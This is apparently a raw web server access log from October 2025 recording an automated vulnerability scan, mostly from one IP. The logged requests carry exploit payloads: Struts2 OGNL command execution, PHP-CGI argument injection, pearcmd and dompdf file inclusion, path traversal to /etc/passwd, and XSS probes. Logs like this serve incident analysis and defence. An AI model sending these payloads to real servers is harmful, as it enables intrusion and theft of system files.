205.185.122.202 - - [19/Oct/2025:14:00:47 +0530] "GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+U5EQvYnMfs.log HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:00:48 +0530] "GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+6vOBdYK1kR.log HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:14:01:18 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:02:57 +0530] "POST /login.action HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:02:58 +0530] "POST /login.action HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:02:58 +0530] "GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:14:02:58 +0530] "GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:14:03:00 +0530] "GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:03:00 +0530] "GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1" 404 1070
176.65.149.21 - - [19/Oct/2025:14:03:58 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:14:04:05 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:06:49 +0530] "POST /scripts/setup.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:06:50 +0530] "POST /scripts/setup.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:06:50 +0530] "POST /axis2/axis2-admin/login HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:06:51 +0530] "POST /axis2-admin/login HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:06:51 +0530] "POST /axis2/axis2-admin/login HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:14:06:51 +0530] "POST /axis2-admin/login HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:06:55 +0530] "GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:14:06:55 +0530] "GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:14:07:03 +0530] "GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:14:07:03 +0530] "GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:14:07:06 +0530] "GET /login-x.php HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:14:07:06 +0530] "GET /login-x.php HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:14:07:07 +0530] "GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:14:07:07 +0530] "GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:14:07:18 +0530] "GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:14:07:18 +0530] "GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:14:07:23 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:07:23 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:07:23 +0530] "GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:14:07:24 +0530] "GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:14:08:09 +0530] "GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:14:08:10 +0530] "GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:14:08:10 +0530] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:14:08:10 +0530] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:14:08:12 +0530] "GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:14:08:12 +0530] "GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:14:08:20 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:08:20 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:08:29 +0530] "GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:14:08:29 +0530] "GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:14:08:33 +0530] "GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:08:33 +0530] "GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:08:58 +0530] "GET /reports/rwservlet/showenv HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:14:08:58 +0530] "GET /reports/rwservlet/showenv HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:14:09:00 +0530] "GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:09:02 +0530] "GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:14:09:15 +0530] "GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:09:16 +0530] "GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:09:20 +0530] "GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:14:09:20 +0530] "GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1" 404 1108
45.153.34.54 - - [19/Oct/2025:14:09:45 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.212 - - [19/Oct/2025:14:10:18 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:10:27 +0530] "GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:14:10:27 +0530] "POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:14:10:27 +0530] "GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:14:10:28 +0530] "POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:14:10:28 +0530] "GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:14:10:28 +0530] "GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:14:10:35 +0530] "POST /user.action HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:14:10:35 +0530] "POST /user.action HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:38 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:14:10:39 +0530] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1018
196.251.115.248 - - [19/Oct/2025:14:10:50 +0530] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 -
196.251.115.248 - - [19/Oct/2025:14:10:50 +0530] "CONNECT api.ipify.org:443 HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:14:11:34 +0530] "GET /wp-content/plugins/uploader/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:11:35 +0530] "GET /wp-content/plugins/uploader/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1118
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:14:11:59 +0530] "GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:14:12:00 +0530] "GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1118
205.185.122.202 - - [19/Oct/2025:14:12:00 +0530] "GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:14:12:00 +0530] "GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:14:12:00 +0530] "GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:14:12:00 +0530] "GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:14:12:00 +0530] "GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:14:12:00 +0530] "GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:14:12:10 +0530] "GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:12:10 +0530] "GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:14:13:02 +0530] "GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:14:13:03 +0530] "GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:14:13:11 +0530] "GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:14:13:11 +0530] "GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:14:13:13 +0530] "GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:14:13:13 +0530] "GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1" 404 1074
204.76.203.212 - - [19/Oct/2025:14:13:50 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:14:01 +0530] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:14:02 +0530] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:14:21 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:14:14:21 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:14:15:01 +0530] "GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1118
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1128
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1128
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1136
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1118
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1224
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1224
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1136
205.185.122.202 - - [19/Oct/2025:14:15:02 +0530] "GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:14:15:23 +0530] "POST /_search?pretty HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:15:23 +0530] "POST /_search?pretty HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:14:17:06 +0530] "POST /?q=node&destination=node HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:17:06 +0530] "POST /?q=node&destination=node HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:18:55 +0530] "GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:14:18:55 +0530] "GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:14:18:57 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:18:57 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:19:06 +0530] "GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:14:19:06 +0530] "GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1" 404 1078
204.76.203.219 - - [19/Oct/2025:14:20:08 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:21:40 +0530] "GET /wp-content/plugins/movies/readme.txt HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:14:21:40 +0530] "GET /wp-content/plugins/movies/readme.txt HTTP/1.1" 404 1066
204.76.203.219 - - [19/Oct/2025:14:23:44 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:23:52 +0530] "GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:14:23:52 +0530] "GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:14:23:53 +0530] "GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:14:23:53 +0530] "GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:14:23:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:23:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/test-cgi HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /debug.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /test.cgi HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/test-cgi HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/status HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/status HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/test.cgi HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/test HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /test.cgi HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/test HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/test.cgi HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/stats HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/stats HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /debug.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:14:24:13 +0530] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:14:24:15 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:24:15 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:24:24 +0530] "GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1" 404 1100
205.185.122.202 - - [19/Oct/2025:14:24:24 +0530] "GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1" 404 1100
205.185.122.202 - - [19/Oct/2025:14:24:26 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:14:24:26 +0530] "GET / HTTP/1.1" 200 11250
